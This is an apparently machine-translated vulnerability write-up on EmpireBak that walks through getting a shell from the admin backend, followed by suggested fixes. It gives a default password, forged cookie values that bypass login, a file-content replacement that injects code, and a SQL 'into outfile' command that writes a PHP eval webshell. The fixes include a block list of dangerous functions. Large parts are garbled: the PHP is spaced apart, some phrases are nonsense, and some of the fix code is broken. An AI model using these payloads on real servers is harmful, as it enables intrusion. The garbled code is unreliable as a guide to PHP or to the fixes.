Empirebak \ class \ functions. php, \ class \ combakfun. php GETSHELL vul

Empirebak \ class \ functions. php, \ class \ combakfun. php GETSHELL vul
1. vulnerability description 2. vulnerability trigger Condition 3. vulnerability impact Scope 4. vulnerability code analysis 5. defense Method 6. attack and Defense thinking 1. vulnerability Description: EmpireBak is a completely free software designed specifically for Mysql big data backup and import. The system uses volume-based backup and import to theoretically back up databases of any size, empirebak has many GETSHELL vulnerabilities. This article discusses various methods from entering the background to GETSHELL one by one. vulnerability trigger condition 0x1: The default weak password enters the background admin123456 // The default weak password is 0x2: forged cookie logon background authorization: javasebak_bakrnd: 35y5cCnnA4Kh ebak_bakusername: admin ebak_baklogintime: 4070883661 // use the preceding cookies to directly access admin. php uses the firefox tamper data proxy to capture packets and visit the following urls: http://localhost/EmpireBak2010/admin.phphttp://localhost/EmpireBak2010/DoSql.php When tamper data is paused, modify the cookie value. If no cookie exists, you can directly log on to the specified backend page without logging in. Cookie = ebak_loginebakckpass = enabled; ebak_bakrnd = 35y5cCnnA4Kh; ebak_bakusername = admin; ebak_baklogintime = 40708836610x3: Create xx in the background "manage backup directory. the IIS parsing vulnerability in the asp Directory has been fixed by GETSHELL in the new version of the Empire backup cms. This vulnerability exists only when the target server is IIS. In actual situations, most of them are PHP + APACHE architectures 0x4: backing up data and replacing the contents of the directory file GETHSLL 1. back up data once after login 2. you can select the directory to which the data is backed up. The default value is safemod 3. after the backup is complete, go to the "manage backup directory", package and download // all the tables in the safemod directory after the backup are saved in PHP 4. view the downloaded backup file. the Empirebak "manage backup directory" contains a replacement File Content Function. Select the same directory as the one you just downloaded and click "replace file content: http://www.xxx.com/diguo/RepFiletext.php?mypath=safemod 6. For example, replace the config. php content.

/* <? Php $ B _table = "ecs_ad_custom"; $ tb [ecs_ad_custom] = 1; $ B _baktype = 0; $ B _filesize = 300; $ B _bakline = 500; $ B _autoauf = 1; $ B _dbname = "test"; $ B _stru = 1; $ B _strufour = 0; $ B _dbchar = "auto"; $ B _beover = 0; $ B _insertf = "replace "; $ B _autofield = ","; $ B _bakdatatype = 0;?> */Replace the character $ B _bakdatatype = 0 with: $ B _bakdatatype = 0; phpinfo ();

7. http: // xxx/diguo/bdata/safemod/config. php: The phpinfo content is displayed. GETSHELL is successful. 0x5: execute custom SQL to export GETSHELL select '<? Php @ eval ($ _ POST [pass]);?> 'Into outfile' c:/web root path/xiaohan. php' 3. Vulnerability impact Scope 4. Vulnerability code analysis 0x1: Counterfeit cookie login to the background

\ Admin. php <? Phprequire ('class/connect. php '); require ('class/functions. php '); // verify whether the logon status is in the $ lur = islogin (); $ loginin = $ lur ['username']; $ rnd = $ lur ['rnd']; require LoadAdminTemp ('eadmin. php ');?>

 

\ Class \ functions. php

// Whether to log on to function islogin ($ uname = '', $ urnd ='') {// die (var_dump ($ _ COOKIE )); $ _ COOKIE ['ebak _ loginebakckpass'] = "success"; $ _ COOKIE ['ebak _ baklogintime'] = "4070883661";/* from the configuration file/class/config. php. The root cause of the vulnerability is that the CMS adopts the default value $ set_username = "admin"; $ set_outtime = "60"; */global $ set_username, $ set_outtime; // obtain the bakusername from the global array of $ _ cookies. The hacker injects: $ _ COOKIE ['ebak _ bakusername'] = "admin"; $ usernam E = $ uname? $ Uname: getcvar ('bakusername'); // obtain bakrnd from the global $ _ COOKIE array. The hacker injects the following information: $ _ COOKIE ['ebak _ bakrnd'] = "35y5cCnnA4Kh"; $ rnd = $ urnd? $ Urnd: getcvar ('bakrnd'); // if (empty ($ username) | empty ($ rnd) {printerror ("NotLogin", "index. php ");} // the hacker's target is login-free admin. Here it must be equal to if ($ username <> $ set_username) {printerror (" NotLogin "," index. php ");}/* Verify the cookie value $ username = admin $ rnd = 35y5cCnnA4Kh */Ebak_CHCookieRnd ($ username, $ rnd); $ time = time (); if ($ time-getcvar ('baklogintime')> $ set_outtime * 60) {printerror ("OutLogintime", "index. php ");} esetcookie (" baklogintime ", $ time, 0); $ lr ['username'] = $ username; $ lr ['rnd'] = $ rnd; return $ lr ;}

 

\ Class \ functions. php

// Verify the COOKIE authentication function Ebak_CHCookieRnd ($ username, $ rnd) {/* $ set_loginrnd is config. the source of the vulnerability is the default value $ set_loginrnd = "YFfd33mV2MrKwDenkecYWZETWgUwMV"; */global $ set_loginrnd; // The calculated result is always: $ ckpass = 119770adb578053dcb383f67a81bcbc6 $ ckpass = md5 ($ rnd. $ set_loginrnd ). '-'. $ rnd. '-'. $ username. '-'); // if ($ ckpass <> getcvar ('loginebakckpass') {printerror ("NotLogin", "index. php ");}}

 

0x2: Backup Data, replace the contents of the directory file GETHSLL

\ Phome. phpelseif ($ phome = "RepPathFiletext") // you are busy with Lu luyun. You have recorded magnesium {Ebak_RepPathFiletext ($ _ POST );}

 

\ Class \ combakfun. php

// Replace the File Content function Ebak_RepPathFiletext ($ add) {global $ bakpath; // Replace the path of the target file $ mypath = trim ($ add ['mypath']); // The replaced content $ oldword = Ebak_ClearAddsData ($ add ['oldword']); // new content to be replaced $ newword = Ebak_ClearAddsData ($ add ['newword']); $ dozz = (int) $ add ['dozz ']; if (empty ($ oldword) | empty ($ mypath) {printerror ("EmptyRepPathFiletext", "history. go (-1) ");} if (strstr ($ mypath ,".. ") {printerror (" NotChangeRepPathFiletext "," History. go (-1) ") ;}$ path = $ bakpath."/". $ mypath; if (! File_exists ($ path) {printerror ("PathNotExists", "history. go (-1) ");} $ hand = @ opendir ($ path); // traverses all files in the target directory, while ($ file = @ readdir ($ hand) {$ filename = $ path. "/". $ file; if ($ file! = "." & $ File! = ".. "& Is_file ($ filename) {$ value = ReadFiletext ($ filename); if ($ dozz) {// Replace $ newvalue = Ebak_DoRepFiletextZz ($ oldword, $ newword, $ value);} else {if (! Stristr ($ value, $ oldword) {continue;} $ newvalue = str_replace ($ oldword, $ newword, $ value);} WriteFiletext_n ($ filename, $ newvalue );}} printerror ("RepPathFiletextSuccess", "RepFiletext. php ");}

 

\ Class \ functions. php

// Regular Expression replacement information function Ebak_DoRepFiletextZz ($ oldword, $ newword, $ text) {$ zztext = Ebak_RepInfoZZ ($ oldword, "empire-bak-wm.chief-phome", 0); // No filtering, directly replace $ text = preg_replace ($ zztext, $ newword, $ text); return $ text ;}

 

0x3: execute custom SQL to export GETSHELL \ phome. php

elseif($phome=="DoExecSql") {    Ebak_DoExecSql($_POST);}elseif($phome=="DoTranExecSql") {    $file=$_FILES['file']['tmp_name'];    $file_name=$_FILES['file']['name'];    $file_type=$_FILES['file']['type'];    $file_size=$_FILES['file']['size'];    Ebak_DoTranExecSql($file,$file_name,$file_type,$file_size,$_POST);}

 

\ Class \ combakfun. php

// Execute the SQL statement function Ebak_DoExecSql ($ add) {global $ empire, $ phome_db_dbname, $ phome_db_ver, $ phome_db_char; $ query = $ add ['query']; if (! $ Query) {printerror ("EmptyRunSql", "history. go (-1) ");} // database if ($ add ['mydbname']) {$ empire-> query (" use '". $ add ['mydbname']. "'");} // encode if ($ add ['mydbchar']) {DoSetDbChar ($ add ['mydbchar ']);} $ query = Ebak_ClearAddsData ($ query); // call Ebak_DoRunQuery to execute the final SQL statement Ebak_DoRunQuery ($ query, $ add ['mydbchar '], $ phome_db_ver ); printerror ("RunSqlSuccess", "DoSql. php ");} // upload and execute SQLfunction Ebak_DoTranExecSql ($ fil E, $ file_name, $ file_type, $ file_size, $ add) {global $ empire, $ phome_db_dbname, $ phome_db_ver, $ phome_db_char; if (! $ File_name |! $ File_size) {printerror ("NotChangeSQLFile", "history. go (-1)") ;}$ filetype = GetFiletype ($ file_name); // get the extension if ($ filetype! = ". SQL ") {printerror (" NotTranSQLFile "," history. go (-1) ");} // Upload File $ newfile = 'tmp/uploadsql '. time (). '. SQL '; $ cp = Ebak_DoTranFile ($ file, $ newfile); if (empty ($ cp) {printerror ("TranSQLFileFail", "history. go (-1) ") ;}$ query = ReadFiletext ($ newfile); DelFiletext ($ newfile); if (! $ Query) {printerror ("EmptyRunSql", "history. go (-1) ");} // database if ($ add ['mydbname']) {$ empire-> query (" use '". $ add ['mydbname']. "'");} // encode if ($ add ['mydbchar']) {DoSetDbChar ($ add ['mydbchar ']);} // call Ebak_DoRunQuery to execute the final SQL statement Ebak_DoRunQuery ($ query, $ add ['mydbchar '], $ phome_db_ver); printerror ("RunSqlSuccess", "DoSql. php ") ;}\ class \ functions. php // run SQLfunction Ebak_DoRunQuery ($ SQL, $ mydbchar, $ mydbver) {$ s Ql = str_replace ("\ r", "\ n", $ SQL); $ ret = array (); $ num = 0; // execute multiple statements to split foreach (explode ("; \ n", trim ($ SQL) as $ query) {$ queries = explode ("\ n ", trim ($ query); foreach ($ queries as $ query) {$ ret [$ num]. = $ query [0] = '#' | $ query [0]. $ query [1] = '--'? '': $ Query;} $ num ++;} unset ($ SQL); foreach ($ ret as $ query) {$ query = trim ($ query ); if ($ query) {if (substr ($ query, 0,12) = 'create table') {mysql_query (Ebak_DoCreateTable ($ query, $ mydbver, $ mydbchar )) or die (mysql_error (). "<br> ". $ query);} else {mysql_query ($ query) or die (mysql_error (). "<br> ". $ query );}}}}

 

5. Defense method 0x1: Counterfeit cookie login backend from the perspective of best security practices, cookie-based login-free verification should be conducted using the session mechanism

\ Class \ functions. php // set the COOKIE authentication function Ebak_SCookieRnd ($ username, $ rnd) {// perform SESSION-based login-free verification session_start (); global $ set_loginrnd; // Add the random factor $ ckpass = md5 (md5 ($ rnd. $ set_loginrnd ). '-'. $ rnd. '-'. $ username. '-'. mt_rand (); // SESSION record $ _ SESSION ['ckpass'] = $ ckpass; esetcookie ("loginebakckpass", $ ckpass, 0 );} // verify the COOKIE authentication function Ebak_CHCookieRnd ($ username, $ rnd) {// perform SESSION-based login-free verification session_start (); global $ set_loginrnd; // get the SESSION content $ ckpass =$ _ SESSION ['ckpass']; if ($ ckpass <> getcvar ('loginebakckpass') {printerror ("NotLogin", "index. php ");}}

 

0x2: Backup Data, replace the contents of the directory file GETHSLL

\ Class \ combakfun. php // Replace the File Content function Ebak_RepPathFiletext ($ add) {global $ bakpath; // Replace the path of the target file $ mypath = trim ($ add ['mypath']); // The replaced content $ oldword = Ebak_ClearAddsData ($ add ['oldword']); // new content to be replaced $ newword = Ebak_ClearAddsData ($ add ['newword']); /* filter dangerous keywords for the content to be replaced */if (preg_match ("/([^ a-zA-Z0-9 }) + (extract | parse_str | str_replace | unserialize | ob_start | require | include | array_map | preg_replace | copy | fpu Ts | fopen | file_put_contents | file_get_contents | fwrite | eval | phpinfo | assert | base64_decode | create_function | call_user_func) + (| \ ()/is ", $ newword )) {die ("Request Error! ");}/**/..

 

0x3: execute custom SQL to export GETSHELL

\ Class \ functions. php // run SQLfunction Ebak_DoRunQuery ($ SQL, $ mydbchar, $ mydbver) {$ SQL = str_replace ("\ r", "\ n", $ SQL ); $ ret = array (); $ num = 0; // execute multiple statements to split foreach (explode ("; \ n", trim ($ SQL) as $ query) {$ queries = explode ("\ n", trim ($ query); foreach ($ queries as $ query) {$ ret [$ num]. = $ query [0] = '#' | $ query [0]. $ query [1] = '--'? '': $ Query;} $ num ++;} unset ($ SQL); foreach ($ ret as $ query) {$ query = trim ($ query ); if ($ query) {/* SQL Injection filter */if (preg_match ("/select. *. * (outfile | dumpfile)/sim ", $ query, $ matches) {echo" request error! ". "</Br> ". $ matches [0]; die () ;}/ **/if (substr ($ query,) = 'create table') {mysql_query (Ebak_DoCreateTable ($ query, $ mydbver, $ mydbchar) or die (mysql_error (). "<br> ". $ query);} else {mysql_query ($ query) or die (mysql_error (). "<br> ". $ query );}}}}